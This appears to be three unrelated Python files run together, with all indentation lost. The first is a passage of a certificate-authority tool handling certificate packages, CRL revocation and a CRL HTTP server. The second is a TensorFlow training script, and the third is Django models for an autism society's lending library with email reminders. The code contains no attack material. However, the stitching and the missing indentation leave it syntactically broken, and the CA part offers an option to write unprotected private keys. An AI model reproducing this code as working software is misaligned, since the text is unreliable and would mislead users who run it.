with open('cacrl.der', 'rb') as f:
crl = f.read()
with open('cacrl.pem', 'r') as f:
crlpem = f.read()
cert_obj = X509.load_cert_string(cert)
serial = cert_obj.get_serial_number()
subject = str(cert_obj.get_subject())
priv = read_private()
private = priv[0][name]
with open("%s-private.pem" % name, 'r') as f:
prot_priv = f.read()
# code to create a pem formatted protected private key using the keystore password
# pk = EVP.load_key_string(str(priv[0][name]))
# f = BIO.MemoryBuffer()
# # globalcb will return the global password provided by the user
# pk.save_key_bio(f, 'aes_256_cbc', globalcb)
# prot_priv = f.getvalue()
# f.close()
# no compression to avoid extraction errors in tmpfs
sf = io.BytesIO()
with zipfile.ZipFile(sf, 'w', compression=zipfile.ZIP_STORED) as f:
f.writestr('%s-public.pem' % name, pub)
f.writestr('%s-cert.crt' % name, cert)
f.writestr('%s-private.pem' % name, private)
f.writestr('cacert.crt', cacert)
f.writestr('cacrl.der', crl)
f.writestr('cacrl.pem', crlpem)
pkg = sf.getvalue()
if insecure:
logger.warning(
"Unprotected private keys in cert package being written to disk")
with open('%s-pkg.zip' % name, 'w') as f:
f.write(pkg)
else:
# actually output the package to disk with a protected private key
with zipfile.ZipFile('%s-pkg.zip' % name, 'w', compression=zipfile.ZIP_STORED) as f:
f.writestr('%s-public.pem' % name, pub)
f.writestr('%s-cert.crt' % name, cert)
f.writestr('%s-private.pem' % name, prot_priv)
f.writestr('cacert.crt', cacert)
f.writestr('cacrl.der', crl)
f.writestr('cacrl.pem', crlpem)
logger.info("Creating cert package for %s in %s-pkg.zip" %
(name, name))
return pkg, serial, subject
finally:
os.chdir(cwd)
def convert_crl_to_pem(derfile, pemfile):
if config.get('general', 'ca_implementation') == 'openssl':
with open(pemfile, 'w') as f:
f.write("")
else:
cmd = ('openssl', 'crl', '-in', derfile, '-inform', 'der',
'-out', pemfile)
cmd_exec.run(cmd)
def get_crl_distpoint(cert_path):
cert_obj = X509.load_cert(cert_path)
text = cert_obj.as_text()
incrl = False
distpoint = ""
for line in text.split('\n'):
line = line.strip()
if line.startswith("X509v3 CRL Distribution Points:"):
incrl = True
if incrl and line.startswith("URI:"):
distpoint = line[4:]
break
return distpoint
# to check: openssl crl -inform DER -text -noout -in cacrl.der
def cmd_revoke(workingdir, name=None, serial=None):
cwd = os.getcwd()
try:
config.ch_dir(workingdir, logger)
priv = read_private()
if name is not None and serial is not None:
raise Exception(
"You may not specify a cert and a serial at the same time")
if name is None and serial is None:
raise Exception("You must specify a cert or a serial to revoke")
if name is not None:
# load up the cert
cert = X509.load_cert("%s-cert.crt" % name)
serial = cert.get_serial_number()
# convert serial to string
serial = str(serial)
# get the ca key cert and keys as strings
with open('cacert.crt', 'r') as f:
cacert = f.read()
ca_pk = priv[0]['ca'].decode('utf-8')
if serial not in priv[0]['revoked_keys']:
priv[0]['revoked_keys'].append(serial)
crl = ca_impl.gencrl(priv[0]['revoked_keys'], cacert, ca_pk)
write_private(priv)
# write out the CRL to the disk
if os.stat('cacrl.der').st_size:
with open('cacrl.der', 'wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der", "cacrl.pem")
finally:
os.chdir(cwd)
return crl
# regenerate the crl without revoking anything
def cmd_regencrl(workingdir):
cwd = os.getcwd()
try:
config.ch_dir(workingdir, logger)
priv = read_private()
# get the ca key cert and keys as strings
with open('cacert.crt', 'r') as f:
cacert = f.read()
ca_pk = str(priv[0]['ca'])
crl = ca_impl.gencrl(priv[0]['revoked_keys'], cacert, ca_pk)
write_private(priv)
# write out the CRL to the disk
with open('cacrl.der', 'wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der", "cacrl.pem")
finally:
os.chdir(cwd)
return crl
def cmd_listen(workingdir, cert_path):
cwd = os.getcwd()
try:
config.ch_dir(workingdir, logger)
# just load up the password for later
read_private(True)
serveraddr = ('', config.CRL_PORT)
server = ThreadedCRLServer(serveraddr, CRLHandler)
if os.path.exists('cacrl.der'):
logger.info("Loading existing crl: %s" %
os.path.abspath("cacrl.der"))
with open('cacrl.der', 'rb') as f:
server.setcrl(f.read())
t = threading.Thread(target=server.serve_forever)
logger.info("Hosting CRL on %s:%d" %
(socket.getfqdn(), config.CRL_PORT))
t.start()
def check_expiration():
logger.info("checking CRL for expiration every hour")
while True: # pylint: disable=R1702
try:
if (os.path.exists('cacrl.der') and
os.stat('cacrl.der').st_size):
cmd = ('openssl', 'crl', '-inform', 'der', '-in',
'cacrl.der', '-text', '-noout')
retout = cmd_exec.run(cmd)['retout']
for line in retout:
line = line.strip()
if line.startswith(b"Next Update:"):
expire = datetime.datetime.strptime(
line[13:].decode('utf-8'), "%b %d %H:%M:%S %Y %Z")
# check expiration within 6 hours
in1hour = datetime.datetime.utcnow() + datetime.timedelta(hours=6)
if expire <= in1hour:
logger.info(
"Certificate to expire soon %s, re-issuing" % expire)
cmd_regencrl(workingdir)
# check a little less than every hour
time.sleep(3540)
except KeyboardInterrupt:
logger.info("TERM Signal received, shutting down...")
# server.shutdown()
break
t2 = threading.Thread(target=check_expiration)
t2.setDaemon(True)
t2.start()
def revoke_callback(revocation):
json_meta = json.loads(revocation['meta_data'])
serial = json_meta['cert_serial']
if revocation.get('type', None) != 'revocation' or serial is None:
logger.error("Unsupported revocation message: %s" % revocation)
return
logger.info("Revoking certificate: %s" % serial)
server.setcrl(cmd_revoke(workingdir, None, serial))
try:
while True:
try:
revocation_notifier.await_notifications(
revoke_callback, revocation_cert_path=cert_path)
except Exception as e:
logger.exception(e)
logger.warning(
"No connection to revocation server, retrying in 10s...")
time.sleep(10)
except KeyboardInterrupt:
logger.info("TERM Signal received, shutting down...")
server.shutdown()
sys.exit()
finally:
os.chdir(cwd)
class ThreadedCRLServer(ThreadingMixIn, HTTPServer):
published_crl = None
def setcrl(self, crl):
self.published_crl = crl
class CRLHandler(BaseHTTPRequestHandler):
def do_GET(self):
logger.info('GET invoked from ' + str(self.client_address) + ' with uri:' + self.path)
if self.server.published_crl is None:
self.send_response(404)
self.end_headers()
else:
# send back the CRL
self.send_response(200)
self.end_headers()
self.wfile.write(self.server.published_crl)
def rmfiles(path):
files = glob.glob(path)
for f in files:
os.remove(f)
def write_private(inp):
priv = inp[0]
salt = inp[1]
global global_password
priv_encoded = yaml.dump(priv, Dumper=SafeDumper)
key = crypto.kdf(global_password, salt)
ciphertext = crypto.encrypt(priv_encoded, key)
towrite = {'salt': salt, 'priv': ciphertext}
with os.fdopen(os.open('private.yml', os.O_WRONLY | os.O_CREAT, 0o600), 'w') as f:
yaml.dump(towrite, f, Dumper=SafeDumper)
def read_private(warn=False):
global global_password
if global_password is None:
setpassword(getpass.getpass(
"Please enter the password to decrypt your keystore: "))
if os.path.exists('private.yml'):
with open('private.yml', 'r') as f:
toread = yaml.load(f, Loader=SafeLoader)
key = crypto.kdf(global_password, toread['salt'])
try:
plain = crypto.decrypt(toread['priv'], key)
except ValueError as e:
raise Exception("Invalid password for keystore") from e
return yaml.load(plain, Loader=SafeLoader), toread['salt']
if warn:
# file doesn't exist, just invent a salt
logger.warning("Private certificate data %s does not exist yet." %
os.path.abspath("private.yml"))
logger.warning(
"Keylime will attempt to load private certificate data again when it is needed.")
return {'revoked_keys': []}, base64.b64encode(crypto.generate_random_key()).decode()
def main(argv=sys.argv):
parser = argparse.ArgumentParser(argv[0])
parser.add_argument('-c', '--command', action='store', dest='command',
required=True, help="valid commands are init,create,pkg,revoke,listen")
parser.add_argument('-n', '--name', action='store',
help='the common name of the certificate to create')
parser.add_argument('-d', '--dir', action='store',
help='use a custom directory to store certificates and keys')
parser.add_argument('-i', '--insecure', action='store_true', default=False,
help='create cert packages with unprotected private keys and write them to disk. USE WITH CAUTION!')
args = parser.parse_args(argv[1:])
if args.dir is None:
if os.getuid() != 0 and config.REQUIRE_ROOT:
logger.error(
"If you don't specify a working directory, this process must be run as root to access %s" % config.WORK_DIR)
sys.exit(-1)
workingdir = config.CA_WORK_DIR
else:
workingdir = args.dir
if args.command == 'init':
cmd_init(workingdir)
elif args.command == 'create':
if args.name is None:
logger.error(
"you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_mkcert(workingdir, args.name)
elif args.command == 'pkg':
if args.name is None:
logger.error(
"you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_certpkg(workingdir, args.name, args.insecure)
elif args.command == 'revoke':
if args.name is None:
logger.error(
"you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_revoke(workingdir, args.name)
elif args.command == 'listen':
if args.name is None:
args.name = os.path.join(workingdir, 'RevocationNotifier-cert.crt')
logger.warning("using default name for revocation cert %s"
% args.name)
cmd_listen(workingdir, args.name)
else:
logger.error("Invalid command: %s" % args.command)
parser.print_help()
sys.exit(-1)
|
train_model.py | import json
import random
import threading
import time
import numpy as np
import tensorflow.compat.v1 as tf
import tensorflow.keras as keras
import tensorflow.keras.layers as layers
import matplotlib.pyplot as plt
label_to_number_dict = None
number_to_label_dict = None
def load_dictionaries():
global label_to_number_dict
global number_to_label_dict
with open("../Organizing/labels/label_to_number_dict.json", "r") as f:
label_to_number_dict = json.load(f)
with open("../Organizing/labels/number_to_label_dict.json", "r") as f:
number_to_label_dict = json.load(f)
def get_current_train_pack_of_data(train_pack_number, size_string):
# If preloaded, just return the preloaded data
if PRELOAD_DATA and preloaded_train_feat is not None:
return preloaded_train_feat, preloaded_train_labels
# Else load it from the disk
loaded_training_labels = np.load("../DatasetBinaryStorage/" + size_string
+ "/train/labels" + str(train_pack_number) + ".npz")['arr_0']
loaded_training_features = np.load("../DatasetBinaryStorage/" + size_string
+ "/train/features" + str(train_pack_number) + ".npz")['arr_0']
return loaded_training_features, loaded_training_labels
def get_current_validation_pack_of_data(validation_pack_number, size_string):
# If preloaded, just return the preloaded data
if PRELOAD_DATA and preloaded_val_feat is not None:
return preloaded_val_feat, preloaded_val_labels
# Else load it from the disk
loaded_validation_labels = np.load("../DatasetBinaryStorage/" + size_string
+ "/validate/labels" + str(validation_pack_number) + ".npz")['arr_0']
loaded_validation_features = np.load("../DatasetBinaryStorage/" + size_string
+ "/validate/features" + str(validation_pack_number) + ".npz")['arr_0']
return loaded_validation_features, loaded_validation_labels
PRELOAD_DATA = False
preloaded_val_feat = None
preloaded_val_labels = None
preloaded_train_feat = None
preloaded_train_labels = None
def target_preload_train(train_pack_number, size_string):
global preloaded_train_feat
global preloaded_train_labels
preloaded_train_labels = np.load("../DatasetBinaryStorage/" + size_string
+ "/train/labels" + str(train_pack_number) + ".npz")['arr_0']
preloaded_train_feat = np.load("../DatasetBinaryStorage/" + size_string
+ "/train/features" + str(train_pack_number) + ".npz")['arr_0']
def target_preload_validation(validation_pack_number, size_string):
global preloaded_val_feat
global preloaded_val_labels
preloaded_val_labels = np.load("../DatasetBinaryStorage/" + size_string
+ "/validate/labels" + str(validation_pack_number) + ".npz")['arr_0']
preloaded_val_feat = np.load("../DatasetBinaryStorage/" + size_string
+ "/validate/features" + str(validation_pack_number) + ".npz")['arr_0']
def preload_training_data(pack_number, size_string):
global preloaded_train_feat
global preloaded_train_labels
if PRELOAD_DATA:
del preloaded_train_feat, preloaded_train_labels
t = threading.Thread(target=target_preload_train, args=[pack_number, size_string])
t.start()
def preload_validation_data(pack_number, size_string):
global preloaded_val_feat
global preloaded_val_labels
if PRELOAD_DATA:
del preloaded_val_feat, preloaded_val_labels
t = threading.Thread(target=target_preload_validation, args=[pack_number, size_string])
t.start()
def train_model(model, model_save_path, batch_size, train_pack_size,
validation_pack_size, total_epochs, pack_epochs, width, height):
global preloaded_train_feat
global preloaded_train_labels
global preloaded_val_labels
global preloaded_val_feat
# Initialize training parameters
size = f"{width}x{height}"
train_poz = -1
validation_poz = -1
current_epoch = 0
train_indexes = [x for x in range(train_pack_size)]
validation_indexes = [x for x in range(validation_pack_size)]
random.shuffle(train_indexes)
random.shuffle(validation_indexes)
last_train_index = train_indexes[0]
last_validation_index = validation_indexes[0]
# Data arrays
loaded_training_features = []
loaded_training_labels = []
loaded_validation_features = []
loaded_validation_labels = []
# threshold for saving the model
next_threshold_checkpoint = 1
threshold = total_epochs // 10 * next_threshold_checkpoint
# If only one package is available for training
if train_pack_size == 1:
# Load Data Packets for Training
loaded_training_features, loaded_training_labels = get_current_train_pack_of_data(train_indexes[train_poz],
size)
loaded_validation_features, loaded_validation_labels = get_current_validation_pack_of_data(
validation_indexes[validation_poz], size)
# Train & Exit
return core_train_model(model, model_save_path, loaded_training_features, loaded_training_labels,
loaded_validation_features, loaded_validation_labels, total_epochs, batch_size, True)
# Print current queue for training
print(train_indexes)
print(validation_indexes)
if PRELOAD_DATA:
train_poz = 0
validation_poz = 0
time_x = time_z = time.time()
while current_epoch < total_epochs:
# Load & Preload Training Data Packages
if True:
del loaded_training_features, loaded_training_labels
train_poz += 1
# Shuffle training queue
if train_poz == train_pack_size:
train_poz = 0
random.shuffle(train_indexes)
print(train_indexes)
# Load Training Data
loaded_training_features, loaded_training_labels = get_current_train_pack_of_data(
train_indexes[train_poz - 1],
size)
# Preload Next Training Package
preload_training_data(train_indexes[train_poz], size)
# Load & Preload Validation Data Packages
if validation_pack_size != 1:
del loaded_validation_labels, loaded_validation_features
validation_poz += 1
# Shuffle validation queue
if validation_poz == validation_pack_size:
validation_poz = 0
random.shuffle(validation_indexes)
print(validation_indexes)
# Load Validation Data
loaded_validation_features, loaded_validation_labels = get_current_validation_pack_of_data(
validation_indexes[validation_poz - 1], size)
# Preload Next Validation Package
preload_validation_data(validation_indexes[validation_poz], size)
elif current_epoch == 0:
# Load Validation Data
loaded_validation_features, loaded_validation_labels = get_current_validation_pack_of_data(
validation_indexes[validation_poz], size)
# Update Save Checkpoint
save = False
if current_epoch > threshold:
save = True
next_threshold_checkpoint += 1
threshold = (total_epochs // 10) * next_threshold_checkpoint
# Train model
core_train_model(model, model_save_path, loaded_training_features, loaded_training_labels,
loaded_validation_features, loaded_validation_labels, pack_epochs, batch_size, save)
# Update global epoch progress
current_epoch += pack_epochs
# Print Information about the Training Process
print(f"\nGlobal Epochs: {current_epoch} / {total_epochs}")
if not PRELOAD_DATA:
print(f"Trained on pack [{train_indexes[train_poz]}]")
print(f"Validated on pack [{validation_indexes[validation_poz]}]")
else:
print(f"Trained on pack [{last_train_index}]")
print(f"Validated on pack [{last_validation_index}]")
last_train_index = train_indexes[train_poz]
last_validation_index = validation_indexes[validation_poz]
time_y = time.time()
print(f"Training Session Time : {time_y - time_x}s")
print(f"Total Training Time : {time_y - time_z}s")
time_x = time_y
def get_premade_model(input_shape, outputs_number, lr):
base_model = tf.keras.applications.MobileNetV2(input_shape=(input_shape[1],
input_shape[0],
input_shape[2]), include_top=False,
weights='imagenet')
base_model.trainable = False
model = keras.Sequential(
[
base_model,
keras.layers.AveragePooling2D(),
keras.layers.Flatten(),
keras.layers.Dense(64, activation="relu"),
keras.layers.Dense(outputs_number, activation="softmax")
]
)
optimizer = keras.optimizers.Adam(learning_rate=lr)
model.compile(loss=tf.keras.losses.categorical_crossentropy, optimizer=optimizer, metrics=["accuracy"])
return model
def core_train_model(model, model_save_path, train_features, train_labels, validation_features, validation_labels,
epochs, batch_size, save):
# lr_reduction = keras.callbacks.ReduceLROnPlateau(monitor='loss',)
history = model.fit(x=train_features, y=train_labels, validation_data=(validation_features, validation_labels),
epochs=epochs, shuffle=True, batch_size=batch_size)
if save:
model.save(model_save_path)
return history
def plot_model_history(model_history, name):
fig, axs = plt.subplots(1, 2, figsize=(15, 5))
# summarize history for accuracy
axs[0].plot(model_history['acc'])
axs[0].plot(model_history['val_acc'])
axs[0].set_title('Model Accuracy')
axs[0].set_ylabel('accuracy')
axs[0].set_xlabel('epoch')
axs[0].legend(['train', 'validation'], loc='best')
# summarize history for loss30
axs[1].plot(model_history['loss'])
axs[1].plot(model_history['val_loss'])
axs[1].set_title('Model Loss')
axs[1].set_ylabel('loss')
axs[1].set_xlabel('epoch')
axs[1].legend(['train', 'validation'], loc='best')
# save
plt.savefig("../Models&Learning/graphs/" + name + ".png")
plt.show()
def manage_history(model_history, save, load):
model_history = {'acc': [float(x) for x in model_history.history['acc']],
'val_acc': [float(x) for x in model_history.history['val_acc']],
'loss': [float(x) for x in model_history.history['loss']],
'val_loss': [float(x) for x in model_history.history['val_loss']]}
if load:
with open("history", "r") as f:
last_history = json.load(f)
last_history['acc'].extend(model_history['acc'])
last_history['val_acc'].extend(model_history['val_acc'])
last_history['loss'].extend(model_history['loss'])
last_history['val_loss'].extend(model_history['val_loss'])
model_history = {'acc': last_history['acc'],
'val_acc': last_history['val_acc'],
'loss': last_history['loss'],
'val_loss': last_history['val_loss']}
if save:
with open("history", "w+") as f:
json.dump(
{'acc': model_history['acc'], 'val_acc': model_history['val_acc'],
'loss': model_history['loss'], 'val_loss': model_history['val_loss']},
f)
plot_model_history(model_history, MODEL_NAME)
def rescale(x):
return x / 255.0
def hsv_and_grayscale(x):
y = tf.image.rgb_to_hsv(x)
return tf.concat([y, tf.image.rgb_to_grayscale(y)], axis=-1)
def hsv_and_normal(x):
return tf.concat([x, tf.image.rgb_to_hsv(x)], axis=-1)
def greyscale_and_normal(x):
return tf.concat([x, tf.image.rgb_to_grayscale(x)], axis=-1)
def grey_norm_hsv(x):
return tf.concat([x, tf.image.rgb_to_grayscale(x), tf.image.rgb_to_hsv(x)], axis=-1)
def flip_left_right(x):
return tf.image.random_flip_left_right(x)
def flip_up_down(x):
return tf.image.random_flip_up_down(x)
def aug_brightness(x):
return tf.image.random_brightness(x, 0.2)
def rotation(x):
return keras.preprocessing.random_rotation(x,20)
def get_model(input_shape, outputs_number, lr):
model = tf.keras.Sequential()
model.add(layers.InputLayer(input_shape=input_shape))
model.add(layers.Lambda(flip_left_right))
model.add(layers.Lambda(flip_up_down))
model.add(layers.Lambda(grey_norm_hsv))
model.add(layers.Lambda(rescale))
model.add(layers.Conv2D(filters=64, kernel_size=(11, 11), padding="same", activation="relu"))
model.add(layers.MaxPool2D(pool_size=(3, 3), strides=2))
model.add(layers.Conv2D(filters=128, kernel_size=(5, 5), padding="same", activation="relu"))
model.add(layers.MaxPool2D(pool_size=(3, 3), strides=2))
model.add(layers.Conv2D(filters=256, kernel_size=(3, 3), activation="relu"))
model.add(layers.Conv2D(filters=256, kernel_size=(3, 3), activation="relu"))
model.add(layers.Conv2D(filters=256, kernel_size=(3, 3), activation="relu"))
model.add(layers.MaxPool2D(pool_size=(3, 3), strides=2))
model.add(layers.Flatten())
model.add(layers.Dropout(0.5))
model.add(layers.Dense(units=1024, activation="relu"))
model.add(layers.Dropout(0.5))
model.add(layers.Dense(units=1024, activation="relu"))
model.add(layers.Dense(units=outputs_number, activation="softmax"))
optimizer = keras.optimizers.Adam(learning_rate=lr)
model.compile(loss=tf.keras.losses.SparseCategoricalCrossentropy(), optimizer=optimizer, metrics=["accuracy"])
return model
def load_and_craft_model(input_shape, outputs_number, lr, path):
return keras.models.load_model(path)
if __name__ == '__main__':
load_dictionaries()
# Adam and Adamax
# HYPER PARAMETERS
MODEL_ID = 15
WIDTH = 52
HEIGHT = 64
CHANNELS = 3
BATCH_SIZE = 256
LABELS = 262
EPOCHS = 20
PACK_EPOCHS = 1
T_PACK_SIZE = 1
V_PACK_SIZE = 1
LR = 0.00025
PRELOAD_DATA = False
LOAD_MODEL = False
SAVE_HISTORY = False
LOAD_HISTORY = False
MODEL_NAME = f"{WIDTH}x{HEIGHT}_ID{MODEL_ID}"
size = f"{WIDTH}x{HEIGHT}"
if LOAD_MODEL:
model = load_and_craft_model((HEIGHT, WIDTH, CHANNELS), LABELS, LR, "new_gen_models/" + MODEL_NAME)
else:
# Build Model
model = get_model((HEIGHT, WIDTH, CHANNELS), LABELS, LR)
model.summary()
# Train Model
tf.executing_eagerly()
history = train_model(model=model, model_save_path="new_gen_models/" + MODEL_NAME, batch_size=BATCH_SIZE,
width=WIDTH, height=HEIGHT, train_pack_size=T_PACK_SIZE, validation_pack_size=V_PACK_SIZE,
total_epochs=EPOCHS, pack_epochs=PACK_EPOCHS)
manage_history(history, SAVE_HISTORY, LOAD_HISTORY)
|
models.py | """
models.py
ross spicer
updated 2015-04-29
contains the database models for the browser
"""
from django.db import models
from django.core.mail import send_mail, mail_admins
from django.core.exceptions import ValidationError
#
#~ from threading import Thread #didn't work on server
#~ from time import sleep
from datetime import tzinfo, timedelta, datetime
# for comparing time zone sensitive datetimes
ZERO = timedelta(0)
class UTC(tzinfo):
def utcoffset(self, dt):
return ZERO
def tzname(self, dt):
return "UTC"
def dst(self, dt):
return ZERO
utc = UTC()
class Resource(models.Model):
"""
Base Resource model, so that all types have a common numbering system
"""
r_id = models.AutoField(primary_key = True) #auto generated
title = models.CharField(max_length = 160, default='') # title
description = models.TextField(blank=True) # description
homepage = models.BooleanField(default = False) # should the resource
# be shown on the home page
show_in_browser = models.BooleanField(default = True) # for events
# hidden as a user opt
def __unicode__(self):
return self.title
class RLibrary(Resource):
"""
Library item database model
"""
phys_id = models.IntegerField(null=True) #no column in .xls file
author = models.CharField(max_length = 160) # author col in # .xls
# these are the types of items in the Physical Library, some have been
# combined from the .xls file
types = (
('0', 'Book'),
('1', 'DVD'),
('2', 'CD'),
('3', 'VHS'),
('4', 'Binder'),
('5', 'Manual'),
('6', 'Spiral Notebook'),
('7', 'Package(Book, DVD, et. al.)'),
('8', 'Cards'),
('9', 'Book w/ CD'),
('a', 'Activity Book'),
('b', 'Kit'),
('c', 'Various'),
('d', 'Catalogue'),
('e', 'Computer Game'),
('f', 'Watch/Timer'),
)
item_type = models.CharField(max_length=1, choices=types) #Item col in .xls
# The Catagories for Items in the phyiscal libaray
cats = ( #categories in the .xls file
('0', 'Sensory Integration'),
('1', 'DVD/Software materials'),
('2', 'Resources for Professionals & Parents'),
('3', 'Couple Relationships'),
('4', 'Resources for Teaching Children/School'),
('5', 'Support for Siblings'),
('6', 'Resources for Older Children, Teens & Adults'),
('a', 'Behavior'),
('7', "Nonfiction/Novels/Children's Books"),
('8', 'Binder/Folder Resources'),
('9', 'FASD'),
)
catagory = models.CharField(max_length=1, choices=cats) #category col in xls
# borrower info
statuses = (
('0', 'Available'),
('1', 'Reservered'),
('2', 'Checked Out'),
)
status = models.CharField(max_length=1, choices=statuses, default="0")
borrower_name = models.CharField(max_length = 60, default='', blank = True,
verbose_name = 'name')
phone = models.CharField(max_length = 10, default='',blank = True)
email = models.CharField(max_length = 50, default='',blank = True)
checkout_date = models.DateTimeField(blank=True, null=True,
verbose_name = "Check Out Appointment")
return_date = models.DateTimeField(blank=True, null=True,
verbose_name = "Return Appointment")
sender = "autism@asagoldenheart.org"
admin_emails = ["autism@asagoldenheart.org",]
def clean(self):
if self.status == '0':
#~ self.checkout_date = self.return_date = ""
self.email = self.phone = self.borrower_name = ""
if self.status == '1' or self.status == '2':
if self.borrower_name == "":
raise ValidationError("Enter a borrower's Name, " +\
"to schedule an appointment")
if self.phone == "" and self.email == "":
raise ValidationError("Enter a phone number or email, " +\
"to schedule an appointment")
if self.status == '1':
try:
if self.checkout_date < datetime.now(utc):
raise TypeError
except TypeError:
raise ValidationError('The checkout date has past,' +\
'please update')
# check for name & contact
self.email_ar() # start up the admin reminder email thread
if not self.email == "":
self.email_cr()
if self.status == '2':
try:
if self.return_date < datetime.now(utc):
raise TypeError
except TypeError:
raise ValidationError('The return date has past, please update')
# check for name & contact
self.email_aco() # start up the admin reminder email thread
if not self.email == "":
self.email_cco()
def email_cr(self):
# send email (perhaps write an email thread)
#~ print "sending client resevered email"
subject = "Checkout Appointment Reminder"
msg = "Dear " + self.borrower_name + ',\n\n' +\
"You have set up an appointment to check out " + self.title + \
". Your appointment is at " + str(self.checkout_date)[11:16] + \
" on " + str(self.checkout_date)[:10] +\
". \nThank you, \n\n The Autism Society of Alaska."
recpient = [self.email]
send_mail(subject, msg, self.sender,recpient, fail_silently=True)
def email_ar(self):
#~ print "sending admin resevered email"
# send email
subject = "[ARDA] Checkout Reminder - ("+ self.borrower_name +')'
msg = self.borrower_name + " has set up an appointment to check out " \
+ self.title + ", the Physical ID is " + str(self.phys_id) +\
". The appointment is at " + str(self.checkout_date)[11:16] + \
" on " + str(self.checkout_date)[:10] + '\n\n'\
"Borrower Contact Info:\n" +\
"Name: " + self.borrower_name +'\n' +\
"Email: " + self.email +'\n' +\
"Phone: " + self.phone +'\n'
recpient = self.admin_emails
send_mail(subject, msg, self.sender,recpient, fail_silently=True)
def email_cco(self):
#~ print "sending client check out email"
# send email
subject = "Return Appointment Reminder"
msg = "Dear " + self.borrower_name + ',\n\n' +\
"You have checked out " + self.title + \
" from The Autism Society of Alaska's Library. " +\
". Your appointment to return the book is at " + \
str(self.return_date)[11:16] + \
" on " + str(self.return_date)[:10] +\
". \nThank you, \n\n The Autism Society of Alaska."
recpient = [self.email]
send_mail(subject, msg, self.sender,recpient, fail_silently=True)
def email_aco(self):
#~ print "sending admin check out email"
# send email
subject = "[ARDA] Return Reminder - ("+ self.borrower_name +')'
msg = self.borrower_name + ' has checked out ' + self.title + \
", the Physincal ID is " + str(self.phys_id) + \
". The appointment to return the book is at " + \
str(self.return_date)[11:16] + \
" on " + str(self.return_date)[:10] + '\n\n'\
"Borrower Contact Info:\n" +\
"Name: " + self.borrower_name +'\n' +\
"Email: " + self.email +'\n' +\
"Phone: " + self.phone +'\n'
recpient = self.admin_emails
send_mail(subject, msg, self.sender,recpient, fail_silently=True)
class Meta:
verbose_name ='Library Item'
# Merged with library item
#~ class Borower(models.Model):
#~ """
#~ borrower database model
#~ """
#~ types= (
#~ ('0', 'Available'),
#~ ('1', 'Reserved'),
#~ ('2', 'Checked Out'),
#~ )
#~ status = models.CharField(max_length=1, choices=types, default="0")
#~
#~
#~ resource = models.ForeignKey(RLibrary)
#~ borrower_name = models.CharField(max_length = 50, blank=True)
#~ phone = models.CharField(max_length = 10)
#~ email = models.CharField(max_length = 50)
#~ checkout_date = models.DateField(blank=True, null=True)
#~ return_date = models.DateField(blank=True, null=True)
class ROnline(Resource):
"""
database model for online items
"""
# types of online resources
types = (
('0', 'video'),
('1', 'article'),
('2', 'web site')
)
otype = models.CharField(max_length = 1, choices=types,
verbose_name ="type")
date = models.DateField()
url = models.URLField(blank=True)
class Meta:
verbose_name ='Online Item'
class REvent(Resource):
"""
database model for events
"""
# add types? fund raiser, meet and great, etc.
date_time = models.DateTimeField()
location = models.TextField(blank=True)
archive = models.BooleanField(default = False, verbose_name="Archive Event")
# what else?
def clean(self):
now= datetime.now(utc)
self.show_in_browser = True
#~ self.save()
if (self.date_time < now) and not self.archive:
raise ValidationError("The date & time for the event must be in"+\
"the future, or the event must be archived")
if self.archive:
self.show_in_browser = False
#~ self.save()
return
#~ t = Thread(target = self.hide)
#~ t.start()
#~ def hide(self):
#~ now = datetime.now(utc)
#~ sleep((self.date_time-now).seconds + 2*60*60)
#~ self.show_in_browser = False
#~ self.save()
class Meta:
verbose_name ='Event'
class RService(Resource):
"""
database model for services
"""
address = models.CharField(max_length = 50)
phone = models.CharField(max_length = 10)
email = models.CharField(max_length = 50)
url = models.URLField(blank=True)
class Meta:
verbose_name ='Service'
class SDemo(models.Model):
"""
Demographic search related item Database model
"""
resource = models.ForeignKey(Resource)
age1to3 = models.BooleanField(default=False, verbose_name= "Age 1-3")
age3to18 = models.BooleanField(default=False, verbose_name= "Age 3-18")
age18plus = models.BooleanField(default=False, verbose_name= "Age 18+")
gender_m = models.BooleanField(default=False, verbose_name= "Male")
gender_f = models.BooleanField(default=False, verbose_name= "Female")
class Meta:
verbose_name_plural = verbose_name = "Demographics"
class SBehaviour(models.Model):
"""
Behavior search related item Database model
"""
resource = models.ForeignKey(Resource)
sleep = models.BooleanField(default=False)
safety_home = models.BooleanField(default=False, verbose_name="Safety Home")
safety_public = models.BooleanField(default=False,
verbose_name="Safety Public")
safety_travel = models.BooleanField(default=False,
verbose_name="Safety Travel")
repetition = models.BooleanField(default=False)
aggression = models.BooleanField(default=False)
communication = models.BooleanField(default=False)
nonverbal = models.BooleanField(default=False)
sensory = models.BooleanField(default=False)
meltdown = models.BooleanField(default=False)
anxiety = models.BooleanField(default=False)
change = models.BooleanField(default=False)
nutrition = models.BooleanField(default=False)
class Meta:
verbose_name_plural = verbose_name = "Behaviors"
class SDisorder(models.Model):
"""
Disorder search related item Database model
"""
resource = models.ForeignKey(Resource)
asd = models.BooleanField(default=False,
verbose_name= "Autism Spectrum Disorder")
fas = models.BooleanField(default=False,
verbose_name= "Fetal Alcohol Syndrome")
pdd = models.BooleanField(default=False,
verbose_name= "Pervasive Developmental Disorder")
aspergers = models.BooleanField(default=False,
verbose_name= "Asperger Syndrome")
cdd = models.BooleanField(default=False,
verbose_name= "Cognitive Development Disorder")
class Meta:
verbose_name_plural = verbose_name = "Disorders"
class SServices(models.Model):
"""
service search related item Database model
"""
cities = (
('0', 'State Wide'),
('1', 'Anchorage'),
('2', 'Fairbanks'),
('3', 'Juneau'),
('4', 'Valdez'),
)
resourceLink = models.ForeignKey(Resource)
diagnostic = models.BooleanField(default=False)
resource = models.BooleanField(default=False)
therapy = models.BooleanField(default=False)
educational = models.BooleanField(default=False)
referral = models.BooleanField(default=False)
legal = models.BooleanField(default=False)
city = models.CharField(max_length = 1, choices=cities)
class Meta:
verbose_name_plural = verbose_name = "Service Features"
class SAdditional(models.Model):
"""
Additional search related item Database model
"""
resource = models.ForeignKey(Resource)
parents = models.BooleanField(default = False,
verbose_name = "For Parents & Professionals")
relationships = models.BooleanField(default = False,
verbose_name = "Relationships")
teachers = models.BooleanField(default = False,
verbose_name = "For Teachers")
sibilings = models.BooleanField(default = False,
verbose_name = "For Siblings")
teens = models.BooleanField(default = False,
verbose_name = "For Teens/Young Adults")
class Meta:
